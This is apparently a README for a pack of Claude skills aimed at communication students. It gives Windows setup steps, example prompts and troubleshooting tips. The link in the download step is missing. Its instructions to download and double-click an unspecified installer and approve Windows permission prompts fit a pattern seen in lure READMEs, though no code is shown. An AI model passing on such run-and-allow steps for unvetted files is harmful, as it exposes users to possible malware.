AlterLab-FC-Skills is a set of 72 Claude AI skills for students and teams in communication fields. It helps with PR, advertising, cinema, new media, GenAI production, visual communication, and research work.
Use it to guide Claude through common tasks like writing, planning, reviewing, organizing ideas, and shaping media content with a clear structure.
Use a Windows 10 or Windows 11 PC with a stable internet connection.
You will need:
- A web browser
- Enough free disk space for the download
- Permission to install or copy files if your PC asks for it
If you plan to use Claude Code or a similar setup, keep your Claude account details ready.
Visit the release page to download and run this file:
On the page, look for the latest release and find the file that matches your setup. If the release includes a ZIP file, download it to your PC. If it includes a setup file, download that file instead.
- Open the downloaded file location in File Explorer.
- If the file is a ZIP archive, right-click it and choose Extract All.
- Pick a folder that is easy to find, such as Downloads or Desktop.
- Open the extracted folder.
- If you see an installer or startup file, double-click it.
- If Windows asks for permission, choose Yes.
If the release uses skill folders for Claude, keep the folder structure the same after extraction. Many skill packs depend on the files staying in the right place.
After extraction, you may see folders with names that match different skill areas, such as:
- Communication
- Public relations
- Advertising
- Cinema
- New media
- GenAI production
- Visual communication
- Research methods
Do not rename the folders unless the release notes ask you to do so. Some tools look for exact folder names.
Once the files are in place, open Claude or Claude Code and point it to the skill set if needed.
A simple way to use the skills:
- Open your Claude tool.
- Start a new chat or task.
- Ask for help in plain language.
- Mention the kind of work you want done.
Example prompts:
- Write a PR plan for a student event
- Create a short ad concept for a class project
- Analyze a film scene for visual style
- Draft a social media post set for a campaign
- Build a research outline for a communication study
- Turn rough notes into a clean presentation script
The skills are meant to help Claude respond with better structure, cleaner output, and work that fits media and communication tasks.

If you are using a Claude skill folder setup, the usual path looks like this:
- Download the release from GitHub
- Extract the archive
- Copy the skill folders into the right Claude skills directory
- Restart your Claude tool
- Test one skill with a short prompt
If the release includes a readme or folder guide, follow that file first. It may show the exact placement needed for your system.
After setup, try a simple task to check that everything works:
- Ask Claude to draft a press release headline set
- Ask for a short campaign idea
- Ask for a visual analysis of a poster
- Ask for a research question list on media use
If Claude responds with a more focused structure, the skills are working as intended.
Check these common points:
- The file finished downloading
- The ZIP file was extracted fully
- The folder names stayed the same
- The files were placed in the correct location
- Claude or Claude Code was restarted after setup
If you still do not see the skills, open the release page again and check for notes in the latest version.
